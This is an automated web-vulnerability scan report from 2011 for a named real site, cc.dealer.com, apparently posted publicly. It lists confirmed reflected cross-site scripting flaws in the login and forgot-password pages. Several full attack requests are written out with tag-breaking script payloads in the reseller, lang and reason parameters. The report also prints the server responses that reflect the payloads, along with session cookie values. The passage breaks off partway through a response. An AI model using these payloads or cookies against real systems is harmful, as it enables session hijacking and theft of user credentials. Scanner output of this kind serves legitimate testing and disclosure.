XSS, DORK, HTTP Header Injection, cc.dealer.com

Netsparker - Scan Report Summary

TARGET URL	https://cc.dealer.com/views/login?sessionTime...
SCAN DATE	4/16/2011 8:12:42 PM
REPORT DATE	4/17/2011 7:30:36 AM
SCAN DURATION	01:13:53

Total Requests

Average Speed

req/sec.

identified

confirmed

critical

informational

GHDB, DORK Tests

PROFILE	Previous Settings
ENABLED ENGINES	Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting

Authentication

Scheduled

VULNERABILITIES Vulnerabilities
	IMPORTANT 50 % MEDIUM 29 % LOW 21 %

Cross-site Scripting

6 TOTAL

IMPORTANT

CONFIRMED

XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:

Hi-jacking users' active session
Changing the look of the page within the victims browser.
Mounting a successful phishing attack.
Intercept data and perform man-in-the-middle attacks.

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /views/forgot-password

/views/forgot-password CONFIRMED

https://cc.dealer.com/views/forgot-password?reseller='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ea..

Parameters

Parameter	Type	Value
reseller	GET	'"--></style></script><script>alert(0x000145)</script>
lang	GET	en_US

Request

GET /views/forgot-password?reseller='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000145)%3C/script%3E&lang=en_US HTTP/1.1
Referer: https://cc.dealer.com/views/login?sessionTimedOut=true
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: cc.dealer.com
Cookie: BIGipServerSecureCC5Pool=2248216074.20736.0000; BIGipServerCC5Pool=3036745226.20480.0000; JSESSIONID=1dt87nysoan86; ssoid=6129048a404638d30061b29f3d794177
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 1480
Date: Sun, 17 Apr 2011 01:52:48 GMT
Connection: keep-alive
Cache-Control: must-revalidate
Expires: Wed, 04 Dec 1996 21:29:02 GMT
Pragma: no-cache

<html><head> <meta http-equiv="Content-type" content="text/html; charset=utf-8" /> <title>Dealer.com Forgot Username/Password</title><style type="text/css"> body{ margin:0; padding:0; overflow: hidden; } html, body{ height:100% } td { font: 12px "Lucida Grande",LucidaGrande,verdana,sans-serif; font-weight: bold; } #loginBox { background: url(https://cc1.dealer.com/images/'"--></style></script><script>netsparker(0x000145)</script>/login_graphic.png?0) no-repeat; width: 489px; height: 330px; } * html #loginBox{ padding-top: 80px; padding-left: 0px; } #loginBox table { padding-left: 50px; padding-right: 65px; } #loginBox table{ padding-top: 88px; } * html #loginBox table { width: 400px; padding-left: 0px; margin-left: 20px; margin-right: 35px; } .instructions{ padding: 2px; padding-left: 18px; font-size: 11px; border: 1px solid #ffff77; font-family: arial; font-weight: bold; background: #ffffcc url( https://cc1.dealer.com/assets/icons/small/information.png?1276796052000 ) no-repeat center left; width: 85%; } a, a:hover, a:click, #devLoginLinks a, #devLoginLinks a:hover, #devLoginLinks a:click{ font-weight: normal; /*color: #ff9900;*/ color: #fd6400; } a, a:visited, #devLoginLinks a:visited{ font-weight: normal; /*color: #ff9900;*/ text-decoration: none; color: #fd6400; } a span, #devLoginLinks a span{ font-weight: normal; /*color: #5983ba;*/ text-decoration: none; color: #000000; } a span, #devLoginLinks a span{ border-bottom: 1px dotted #fd6400; } * html .ieHack{ border-bottom: 1px dotted #fd6400; } #links{ margin-bottom: 10px; margin-right: 10px; } #links td, #links td a, #devLoginLinks a{ font-weight: normal; font-size: 11px; } #fireFoxDiv{ visibility: hidden; width: 445px; padding-right: 10px; margin-top: 20px; cursor: hand; } #fireFoxDiv td{ font-size: 11px; font-weight: normal; } .clickable{cursor: pointer;} * html .clickable{cursor: hand;} .error, .required{ color: #880000; } .requiredField{ background: #FFFDE6; } .errorField{ /*border: 1px solid #cc0000;*/ background: #FFD8D3; }</style><script type="text/javascript"> function doSubmit() { if(confirm('Your current password will be reset and a new one will be e-mailed to you. Click OK to continue.')) document.forms[0].submit(); } </script></head><body><form method='POST'><input type='hidden' name='_state' value='submit' class='' > <table id="loginTable" width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td align="center"> <table width="450" border="0" cellpadding="0" cellspacing="0" id="links"> <tr> <td align="center"><a href="/views/login?reseller='"--></style></script><script>netsparker(0x000145)</script>" border="0"><span>Return to login</span></a></td> </tr> </table> <div id="loginBox"> <table width="100%" cellspacing="4" cellpadding="2" border="0"> <tr> <td colspan="2"> <div class="instructions"> Forgot your username? Contact Support<br> Forgot your password? Submit the form below </div> </td> </tr> <tr> <td width="10%" nowrap>Username: <span class="required">*</span></td> <td><input type='text' name='username' value='' class='requiredField' style='width:90%'></td> </tr> <tr> <td width="10%" nowrap>Email Address: <span class="required">*</span></td> <td><input type='text' name='email' value='' class='requiredField' style='width:90%'></td> </tr> <tr> <td colspan="2" align="center"> <input type="button" value='Get New Password' onClick="doSubmit()"> </td> </tr> </table> </div> <div id="fireFoxDiv" onClick=""> </div> </td> </tr> </table></form></body></html>

- /views/login

/views/login CONFIRMED

https://cc.dealer.com/views/login?loginFailed=true&reseller='%22--%3E%3C/style%3E%3C/script%3E%3Cscr..

Parameters

Parameter	Type	Value
loginFailed	GET	true
reseller	GET	'"--></style></script><script>alert(0x000162)</script>
lang	GET	3
reason	GET	INVALID_USERNAME_PASSWORD

Request

GET /views/login?loginFailed=true&reseller='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000162)%3C/script%3E&lang=3&reason=INVALID_USERNAME_PASSWORD HTTP/1.1
Referer: http://cc.dealer.com/views/login?loginFailed=true&reseller=&lang=&reason=INVALID_USERNAME_PASSWORD
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: cc.dealer.com
Cookie: BIGipServerSecureCC5Pool=2248216074.20736.0000; BIGipServerCC5Pool=3036745226.20480.0000; JSESSIONID=b8pucf8ka74jr; ssoid=612f6e8e404638d30061b29fae9e4b4a
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 3732
Date: Sun, 17 Apr 2011 01:59:49 GMT
Connection: keep-alive

<html><head> <meta http-equiv="Content-type" content="text/html; charset=utf-8" /> <title> Control Center Login</title> <script src="https://cc2.dealer.com/javascript/md5.js?1276795935000" language="javascript"></script> <script language="javascript"> function doLogin() { if(hasSubmitted) return false; theForm = document.forms[0]; var pwEl = theForm.elements["password"]; if( pwEl.value != "" && pwEl.value.length != 32) { pwEl.value=hex_md5(pwEl.value); } // password validation in both ext-user-manager.js (for changing password) and login.vm (for expired passwords) hasSubmitted = true; return true; } function forgotPassword() { var extra = ""; if(document.forms[0].elements["username"].value!="") extra="?_username="+document.forms[0].elements["username"].value+"&reseller='"--></style></script><script>netsparker(0x000162)</script>&lang=en_US"; document.location = "/views/forgot-password"+((extra)?extra:"?reseller='"--></style></script><script>netsparker(0x000162)</script>&lang=en_US"); } </script> <style type="text/css" media="screen"> body{ margin:0; padding:0; overflow: hidden; } html, body{ height:100% } td { font: 12px "Lucida Grande",LucidaGrande,verdana,sans-serif; font-weight: bold; } #loginBox { background: url(https://cc2.dealer.com/images/'"--></style></script><script>netsparker(0x000162)</script>/login_graphic.png?0) no-repeat; width: 489px; height: 330px; } * html #loginBox{ padding-top: 80px; padding-left: 0px; } #loginBox table { padding-left: 50px; padding-right: 65px; } #loginBox table{ padding-top: 88px; } * html #loginBox table { width: 400px; padding-left: 0px; margin-left: 20px; margin-right: 35px; } .instructions{ padding: 2px; padding-left: 18px; font-size: 11px; border: 1px solid #ffff77; font-family: arial; font-weight: bold; background: #ffffcc url( https://cc1.dealer.com/assets/icons/small/information.png?1276796052000 ) no-repeat center left; width: 300px; } a, a:hover, a:click, #devLoginLinks a, #devLoginLinks a:hover, #devLoginLinks a:click{ font-weight: normal; /*color: #ff9900;*/ color: #fd6400; } a, a:visited, #devLoginLinks a:visited{ font-weight: normal; /*color: #ff9900;*/ text-decoration: none; color: #fd6400; } a span, #devLoginLinks a span{ font-weight: normal; /*color: #5983ba;*/ text-decoration: none; color: #000000; } a span, #devLoginLinks a span{ border-bottom: 1px dotted #fd6400; } * html .ieHack{ border-bottom: 1px dotted #fd6400; } #links{ margin-bottom: 10px; margin-right: 10px; } #links td, #links td a, #devLoginLinks a{ font-weight: normal; font-size: 11px; } #ie6Upgrade, #ff2Upgrade{ /*visibility: hidden;*/ display: none; width: 445px; padding-right: 10px; margin-top: 20px; cursor: hand; } #ie6Upgrade td, #ff2Upgrade td{ font-size: 11px; font-weight: normal; } .languageName{ text-transform: capitalize; } .clickable{cursor: pointer;} * html .clickable{cursor: hand;}</style></head><body onLoad="doPageLoad()"><form action="/" method="POST" onSubmit="return doLogin();" id="loginForm"><input type="hidden" name="action" value="Login"><input type="hidden" name="reseller" value="'"--></style></script><script>netsparker(0x000162)</script>"><input type="hidden" name="lang" value="3"><table id="loginTable" style="visibility:hidden" width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td align="center"> <table width="450" border="0" cellpadding="5" cellspacing="0" id="links"> <tr> <td align="center"><a href="javascript:addBookmark()" border="0"><span>Bookmark This Page</span></a></td> <td align="center"><a href="javascript:forgotPassword()" border="0"><span>Forgot Username/Password?</span></a></td> </tr> </table> <div id="loginBox"> <table id="loginFormTable" width="100%" cellspacing="4" cellpadding="2" border="0"> <colgroup> <col style="padding-left:5px"> <col width="80%"> </colgroup> <tr> <td colspan="2"> <div class="instructions">Invalid Username or Password, please try again.</div> </td> </tr> <tr> <td nowrap><label for="username">Username:</label></td> <td ><input name="username" style="width: 90%" ></td> </tr> <tr> <td nowrap><label for="password">Password:</label></td> <td><input name="password" type="password" style="width: 90%"></td> </tr> <tr> <td colspan="2" align="center" nowrap> <input type="checkbox" name="storeCookie" value="storeCookie"/> <label for="storeCookie">Remember my username and password</label> </td> </tr> <tr> <td colspan="2" align="center"> <input type="submit" value="Login"> </td> </tr> </table> </div> <div id="ie6Upgrade"> <table border="0" cellpadding="0" cellspacing="0"> <tr> <td align="center" style="color: #ff0000;font-weight:bold;"> You are using on old, unsupported version of Internet Explorer.<br/> If you do not upgrade, you will not be able to use the full functionality of ControlCenter.<br/> <a href="http://www.microsoft.com/windows/downloads/ie/getitnow.mspx" target="_blank"> Click Here to Upgrade Now!<br/> <img src="https://cc3.dealer.com/images/box_ie.jpg?1276795935000" border='0' align='middle'> </a> </td> </tr> </table> </div> <div id="ff2Upgrade"> <table border="0" cellpadding="0" cellspacing="0"> <tr> <td align="center" style="color: #ff0000;font-weight:bold;"> You are using on old version of Firefox which we no longer support.<br/> Starting March 1st, 2009, you will no longer be able to login to ControlCenter with this browser.<br/><br/> <a href="http://www.getfirefox.com" target="_blank"> Click Here to Upgrade Now!<br/> <img src="https://cc2.dealer.com/images/getFireFox2.gif?1276795935000" border='0' align='middle'> </a> </td> </tr> </table> </div> </td> </tr></table></form><script src="https://cc1.dealer.com/js/ddc/veneer/util/ext-browser-info-min.js?1302618944000" language="javascript"></script><script src="https://cc3.dealer.com/js/ddc/veneer/ext-login-validation-min.js?1302618944000" language="javascript"></script><style type="text/css" media="screen"> #browserDetectionTable{ visibility: hidden; } #loggedInTable{ position: absolute; top: 0; left: 0; visibility: hidden; }</style><table id="browserDetectionTable" width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td align="center" valign="top"> <br/><br/><br/><br/><br/><br/><br/> We have minimum browser requirements to use our application.<br/><br/> We require Firefox 3.0 & above on Windows or Macintosh.<br/> or Internet Explorer version 7.0 on Windows.<br/>  Please click one of these options download:<br/><br/> <table width="70%"> <tr> <td align="center" class="clickable" style="color: #fd6400;" valign="middle" onclick="location='http://www.mozilla.com/firefox'"> Click to download Firefox 3.0<br/> <img src="https://cc2.dealer.com/images/getFireFox2.gif?1276795935000" border='0' align='middle'><br/> Click to download Firefox 3.0 </td> <td align="center" class="clickable" valign="middle" style="color: #000099;" onclick="location='http://www.microsoft.com/windows/ie/downloads/default.mspx'"> Click to download IE 7.0<br/> <img src="https://cc3.dealer.com/images/box_ie.jpg?1276795935000" border='0' align='middle'><br/> Click to download IE 7.0 </td> </tr> </table> </td> </tr></table><table id="loggedInTable" border="0" width="100%" height="70%"> <tr> <td align="center" valign="center" style="font-family: arial; font-weight: bold"> <span style="color: #880000"> If you have a pop-up blocker installed, it could prevent the login window from appearing.<br/> Please remember to turn off your pop-up blocker for all dealer.com sites. Thank you. </span><br/><br/> <img src="https://cc1.dealer.com/images/'"--></style></script><script>netsparker(0x000162)</script>/logo.png?0" border='0' height=150><br/> (You are now logged in and may close this window) </td> </tr></table><script type="text/javascript" language="javascript">BrowserInfo.isDev = ("false" == "true");BrowserInfo.embeddedBrowser = ("" == "true");BrowserInfo.isInternal = ("false" == "true");// since this page gets loaded before the main framework, localized strings for JS need to be included this wayLoginValidator.localizedStrings = { "800_X_600_WARNING" : "Your screen resolution is set to 800 x 600.\nAlthough you can use Control Center at this lower resolution, it functions best at a higher resolution, like 1024 x 768."};LoginValidator.validate("","","'"--></style></script><script>netsparker(0x000162)</script>","en_US");</script> <script src="https://ssl.google-analytics.com/ga.js" type="text/javascript"></script> <script type="text/javascript">try{var tracker=_gat._getTracker("UA-248438-3");tracker._initData();tracker._trackPageview()}catch(e){}</script></body> <script language="javascript"> //we need to check for a module hash and preserve that //as well as any query string params //for deep linking into modules var hash = document.location.hash; //we need to reset the form's action //so we include the hash and query params //using get and set Attribute bc there is a form field //named action inside the form....grrrr! var oldAction = document.forms[0].attributes["action"].value; document.forms[0].attributes["action"].value = oldAction + hash; var hasSubmitted = false; if( opener && opener.location.href.indexOf("/views/login") == -1 ){ opener.location = "/views/login?reseller='"--></style></script><script>netsparker(0x000162)</script>&lang=en_US" + (hash); window.close(); } if( window != top ) top.location = location.href; function doPageLoad(){ if( BrowserInfo.isIE() && BrowserInfo.version < 7.0){ //document.getElementById("ie6Upgrade").style.visibility = "visible"; document.getElementById("ie6Upgrade").style.display = "block"; } if( BrowserInfo.isFirefox() && BrowserInfo.version < "3."){ //document.getElementById("ff2Upgrade").style.visibility = "visible"; document.getElementById("ff2Upgrade").style.display = "block"; } if( document.getElementById("loginTable").style.display != "none" ) document.forms[0].username.focus(); } function addBookmark(){ var title = "Control Center Login"; //var url = "http://cc.dealer.com/views/login"; var url = location.href; if( document.all ) window.external.AddFavorite( url, title ); else if( window.sidebar ) window.sidebar.addPanel( title, url, ""); } </script></html>

- /views/login

/views/login CONFIRMED

https://cc.dealer.com/views/login?loginFailed=true&reseller=3&lang='%22--%3E%3C/style%3E%3C/script%3..

Parameters

Parameter	Type	Value
loginFailed	GET	true
reseller	GET	3
lang	GET	'"--></style></script><script>alert(0x000163)</script>
reason	GET	INVALID_USERNAME_PASSWORD

Request

GET /views/login?loginFailed=true&reseller=3&lang='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000163)%3C/script%3E&reason=INVALID_USERNAME_PASSWORD HTTP/1.1
Referer: http://cc.dealer.com/views/login?loginFailed=true&reseller=&lang=&reason=INVALID_USERNAME_PASSWORD
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: cc.dealer.com
Cookie: BIGipServerSecureCC5Pool=2248216074.20736.0000; BIGipServerCC5Pool=3036745226.20480.0000; JSESSIONID=b8pucf8ka74jr; ssoid=612f7905404638d30061b29f5bc6c273
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 3724
Date: Sun, 17 Apr 2011 01:59:52 GMT
Connection: keep-alive

<html><head> <meta http-equiv="Content-type" content="text/html; charset=utf-8" /> <title> Control Center Login</title> <script src="https://cc2.dealer.com/javascript/md5.js?1276795935000" language="javascript"></script> <script language="javascript"> function doLogin() { if(hasSubmitted) return false; theForm = document.forms[0]; var pwEl = theForm.elements["password"]; if( pwEl.value != "" && pwEl.value.length != 32) { pwEl.value=hex_md5(pwEl.value); } // password validation in both ext-user-manager.js (for changing password) and login.vm (for expired passwords) hasSubmitted = true; return true; } function forgotPassword() { var extra = ""; if(document.forms[0].elements["username"].value!="") extra="?_username="+document.forms[0].elements["username"].value+"&reseller=3&lang=en_US"; document.location = "/views/forgot-password"+((extra)?extra:"?reseller=3&lang=en_US"); } </script> <style type="text/css" media="screen"> body{ margin:0; padding:0; overflow: hidden; } html, body{ height:100% } td { font: 12px "Lucida Grande",LucidaGrande,verdana,sans-serif; font-weight: bold; } #loginBox { background: url(https://cc2.dealer.com/images/3/login_graphic.png?0) no-repeat; width: 489px; height: 330px; } * html #loginBox{ padding-top: 80px; padding-left: 0px; } #loginBox table { padding-left: 50px; padding-right: 65px; } #loginBox table{ padding-top: 88px; } * html #loginBox table { width: 400px; padding-left: 0px; margin-left: 20px; margin-right: 35px; } .instructions{ padding: 2px; padding-left: 18px; font-size: 11px; border: 1px solid #ffff77; font-family: arial; font-weight: bold; background: #ffffcc url( https://cc1.dealer.com/assets/icons/small/information.png?1276796052000 ) no-repeat center left; width: 300px; } a, a:hover, a:click, #devLoginLinks a, #devLoginLinks a:hover, #devLoginLinks a:click{ font-weight: normal; /*color: #ff9900;*/ color: #fd6400; } a, a:visited, #devLoginLinks a:visited{ font-weight: normal; /*color: #ff9900;*/ text-decoration: none; color: #fd6400; } a span, #devLoginLinks a span{ font-weight: normal; /*color: #5983ba;*/ text-decoration: none; color: #000000; } a span, #devLoginLinks a span{ border-bottom: 1px dotted #fd6400; } * html .ieHack{ border-bottom: 1px dotted #fd6400; } #links{ margin-bottom: 10px; margin-right: 10px; } #links td, #links td a, #devLoginLinks a{ font-weight: normal; font-size: 11px; } #ie6Upgrade, #ff2Upgrade{ /*visibility: hidden;*/ display: none; width: 445px; padding-right: 10px; margin-top: 20px; cursor: hand; } #ie6Upgrade td, #ff2Upgrade td{ font-size: 11px; font-weight: normal; } .languageName{ text-transform: capitalize; } .clickable{cursor: pointer;} * html .clickable{cursor: hand;}</style></head><body onLoad="doPageLoad()"><form action="/" method="POST" onSubmit="return doLogin();" id="loginForm"><input type="hidden" name="action" value="Login"><input type="hidden" name="reseller" value="3"><input type="hidden" name="lang" value="'"--></style></script><script>netsparker(0x000163)</script>"><table id="loginTable" style="visibility:hidden" width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td align="center"> <table width="450" border="0" cellpadding="5" cellspacing="0" id="links"> <tr> <td align="center"><a href="javascript:addBookmark()" border="0"><span>Bookmark This Page</span></a></td> <td align="center"><a href="javascript:forgotPassword()" border="0"><span>Forgot Username/Password?</span></a></td> </tr> </table> <div id="loginBox"> <table id="loginFormTable" width="100%" cellspacing="4" cellpadding="2" border="0"> <colgroup> <col style="padding-left:5px"> <col width="80%"> </colgroup> <tr> <td colspan="2"> <div class="instructions">Invalid Username or Password, please try again.</div> </td> </tr> <tr> <td nowrap><label for="username">Username:</label></td> <td ><input name="username" style="width: 90%" ></td> </tr> <tr> <td nowrap><label for="password">Password:</label></td> <td><input name="password" type="password" style="width: 90%"></td> </tr> <tr> <td colspan="2" align="center" nowrap> <input type="checkbox" name="storeCookie" value="storeCookie"/> <label for="storeCookie">Remember my username and password</label> </td> </tr> <tr> <td colspan="2" align="center"> <input type="submit" value="Login"> </td> </tr> </table> </div> <div id="ie6Upgrade"> <table border="0" cellpadding="0" cellspacing="0"> <tr> <td align="center" style="color: #ff0000;font-weight:bold;"> You are using on old, unsupported version of Internet Explorer.<br/> If you do not upgrade, you will not be able to use the full functionality of ControlCenter.<br/> <a href="http://www.microsoft.com/windows/downloads/ie/getitnow.mspx" target="_blank"> Click Here to Upgrade Now!<br/> <img src="https://cc3.dealer.com/images/box_ie.jpg?1276795935000" border='0' align='middle'> </a> </td> </tr> </table> </div> <div id="ff2Upgrade"> <table border="0" cellpadding="0" cellspacing="0"> <tr> <td align="center" style="color: #ff0000;font-weight:bold;"> You are using on old version of Firefox which we no longer support.<br/> Starting March 1st, 2009, you will no longer be able to login to ControlCenter with this browser.<br/><br/> <a href="http://www.getfirefox.com" target="_blank"> Click Here to Upgrade Now!<br/> <img src="https://cc2.dealer.com/images/getFireFox2.gif?1276795935000" border='0' align='middle'> </a> </td> </tr> </table> </div> </td> </tr></table></form><script src="https://cc1.dealer.com/js/ddc/veneer/util/ext-browser-info-min.js?1302618944000" language="javascript"></script><script src="https://cc3.dealer.com/js/ddc/veneer/ext-login-validation-min.js?1302618944000" language="javascript"></script><style type="text/css" media="screen"> #browserDetectionTable{ visibility: hidden; } #loggedInTable{ position: absolute; top: 0; left: 0; visibility: hidden; }</style><table id="browserDetectionTable" width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td align="center" valign="top"> <br/><br/><br/><br/><br/><br/><br/> We have minimum browser requirements to use our application.<br/><br/> We require Firefox 3.0 & above on Windows or Macintosh.<br/> or Internet Explorer version 7.0 on Windows.<br/>  Please click one of these options download:<br/><br/> <table width="70%"> <tr> <td align="center" class="clickable" style="color: #fd6400;" valign="middle" onclick="location='http://www.mozilla.com/firefox'"> Click to download Firefox 3.0<br/> <img src="https://cc2.dealer.com/images/getFireFox2.gif?1276795935000" border='0' align='middle'><br/> Click to download Firefox 3.0 </td> <td align="center" class="clickable" valign="middle" style="color: #000099;" onclick="location='http://www.microsoft.com/windows/ie/downloads/default.mspx'"> Click to download IE 7.0<br/> <img src="https://cc3.dealer.com/images/box_ie.jpg?1276795935000" border='0' align='middle'><br/> Click to download IE 7.0 </td> </tr> </table> </td> </tr></table><table id="loggedInTable" border="0" width="100%" height="70%"> <tr> <td align="center" valign="center" style="font-family: arial; font-weight: bold"> <span style="color: #880000"> If you have a pop-up blocker installed, it could prevent the login window from appearing.<br/> Please remember to turn off your pop-up blocker for all dealer.com sites. Thank you. </span><br/><br/> <img src="https://cc1.dealer.com/images/3/logo.png?0" border='0' height=150><br/> (You are now logged in and may close this window) </td> </tr></table><script type="text/javascript" language="javascript">BrowserInfo.isDev = ("false" == "true");BrowserInfo.embeddedBrowser = ("" == "true");BrowserInfo.isInternal = ("false" == "true");// since this page gets loaded before the main framework, localized strings for JS need to be included this wayLoginValidator.localizedStrings = { "800_X_600_WARNING" : "Your screen resolution is set to 800 x 600.\nAlthough you can use Control Center at this lower resolution, it functions best at a higher resolution, like 1024 x 768."};LoginValidator.validate("","","3","en_US");</script> <script src="https://ssl.google-analytics.com/ga.js" type="text/javascript"></script> <script type="text/javascript">try{var tracker=_gat._getTracker("UA-248438-3");tracker._initData();tracker._trackPageview()}catch(e){}</script></body> <script language="javascript"> //we need to check for a module hash and preserve that //as well as any query string params //for deep linking into modules var hash = document.location.hash; //we need to reset the form's action //so we include the hash and query params //using get and set Attribute bc there is a form field //named action inside the form....grrrr! var oldAction = document.forms[0].attributes["action"].value; document.forms[0].attributes["action"].value = oldAction + hash; var hasSubmitted = false; if( opener && opener.location.href.indexOf("/views/login") == -1 ){ opener.location = "/views/login?reseller=3&lang=en_US" + (hash); window.close(); } if( window != top ) top.location = location.href; function doPageLoad(){ if( BrowserInfo.isIE() && BrowserInfo.version < 7.0){ //document.getElementById("ie6Upgrade").style.visibility = "visible"; document.getElementById("ie6Upgrade").style.display = "block"; } if( BrowserInfo.isFirefox() && BrowserInfo.version < "3."){ //document.getElementById("ff2Upgrade").style.visibility = "visible"; document.getElementById("ff2Upgrade").style.display = "block"; } if( document.getElementById("loginTable").style.display != "none" ) document.forms[0].username.focus(); } function addBookmark(){ var title = "Control Center Login"; //var url = "http://cc.dealer.com/views/login"; var url = location.href; if( document.all ) window.external.AddFavorite( url, title ); else if( window.sidebar ) window.sidebar.addPanel( title, url, ""); } </script></html>

- /views/login

/views/login CONFIRMED

https://cc.dealer.com/views/login?loginFailed=true&reseller=3&lang=3&reason='%22--%3E%3C/style%3E%3C..

Parameters

Parameter	Type	Value
loginFailed	GET	true
reseller	GET	3
lang	GET	3
reason	GET	'"--></style></script><script>alert(0x000164)</script>

Request

GET /views/login?loginFailed=true&reseller=3&lang=3&reason='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000164)%3C/script%3E HTTP/1.1
Referer: http://cc.dealer.com/views/login?loginFailed=true&reseller=&lang=&reason=INVALID_USERNAME_PASSWORD
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: cc.dealer.com
Cookie: BIGipServerSecureCC5Pool=2248216074.20736.0000; BIGipServerCC5Pool=3036745226.20480.0000; JSESSIONID=b8pucf8ka74jr; ssoid=612f7905404638d30061b29f5bc6c273
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 3702
Date: Sun, 17 Apr 2011 01:59:53 GMT
Connection: keep-alive

<html><head> <meta http-equiv="Content-type" content="text/html; charset=utf-8" /> <title> Control Center Login</title> <script src="https://cc2.dealer.com/javascript/md5.js?1276795935000" language="javascript"></script> <script language="javascript"> function doLogin() { if(hasSubmitted) return false; theForm = document.forms[0]; var pwEl = theForm.elements["password"]; if( pwEl.value != "" && pwEl.value.length != 32) { pwEl.value=hex_md5(pwEl.value); } // password validation in both ext-user-manager.js (for changing password) and login.vm (for expired passwords) hasSubmitted = true; return true; } function forgotPassword() { var extra = ""; if(document.forms[0].elements["username"].value!="") extra="?_username="+document.forms[0].elements["username"].value+"&reseller=3&lang=en_US"; document.location = "/views/forgot-password"+((extra)?extra:"?reseller=3&lang=en_US"); } </script> <style type="text/css" media="screen"> body{ margin:0; padding:0; overflow: hidden; } html, body{ height:100% } td { font: 12px "Lucida Grande",LucidaGrande,verdana,sans-serif; font-weight: bold; } #loginBox { background: url(https://cc2.dealer.com/images/3/login_graphic.png?0) no-repeat; width: 489px; height: 330px; } * html #loginBox{ padding-top: 80px; padding-left: 0px; } #loginBox table { padding-left: 50px; padding-right: 65px; } #loginBox table{ padding-top: 88px; } * html #loginBox table { width: 400px; padding-left: 0px; margin-left: 20px; margin-right: 35px; } .instructions{ padding: 2px; padding-left: 18px; font-size: 11px; border: 1px solid #ffff77; font-family: arial; font-weight: bold; background: #ffffcc url( https://cc1.dealer.com/assets/icons/small/information.png?1276796052000 ) no-repeat center left; width: 300px; } a, a:hover, a:click, #devLoginLinks a, #devLoginLinks a:hover, #devLoginLinks a:click{ font-weight: normal; /*color: #ff9900;*/ color: #fd6400; } a, a:visited, #devLoginLinks a:visited{ font-weight: normal; /*color: #ff9900;*/ text-decoration: none; color: #fd6400; } a span, #devLoginLinks a span{ font-weight: normal; /*color: #5983ba;*/ text-decoration: none; color: #000000; } a span, #devLoginLinks a span{ border-bottom: 1px dotted #fd6400; } * html .ieHack{ border-bottom: 1px dotted #fd6400; } #links{ margin-bottom: 10px; margin-right: 10px; } #links td, #links td a, #devLoginLinks a{ font-weight: normal; font-size: 11px; } #ie6Upgrade, #ff2Upgrade{ /*visibility: hidden;*/ display: none; width: 445px; padding-right: 10px; margin-top: 20px; cursor: hand; } #ie6Upgrade td, #ff2Upgrade td{ font-size: 11px; font-weight: normal; } .languageName{ text-transform: capitalize; } .clickable{cursor: pointer;} * html .clickable{cursor: hand;}</style></head><body onLoad="doPageLoad()"><form action="/" method="POST" onSubmit="return doLogin();" id="loginForm"><input type="hidden" name="action" value="Login"><input type="hidden" name="reseller" value="3"><input type="hidden" name="lang" value="3"><table id="loginTable" style="visibility:hidden" width="100%" height="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td align="center"> <table width="450" border="0" cellpadding="5" cellspacing="0" id="links"> <tr> <td align="center"><a href="javascript:addBookmark()" border="0"><span>Bookmark This Page</span></a></td> <td align="center"><a href="javascript:forgotPassword()" border="0"><span>Forgot Username/Password?</span></a></td> </tr> </table> <div id="loginBox"> <table id="loginFormTable" width="100%" cellspacing="4" cellpadding="2" border="0"> <colgroup> <col style="padding-left:5px"> <col width="80%"> </colgroup> <tr> <td colspan="2"> <div class="instructions">'"--></style></script><script>netsparker(0x000164)</script></div> 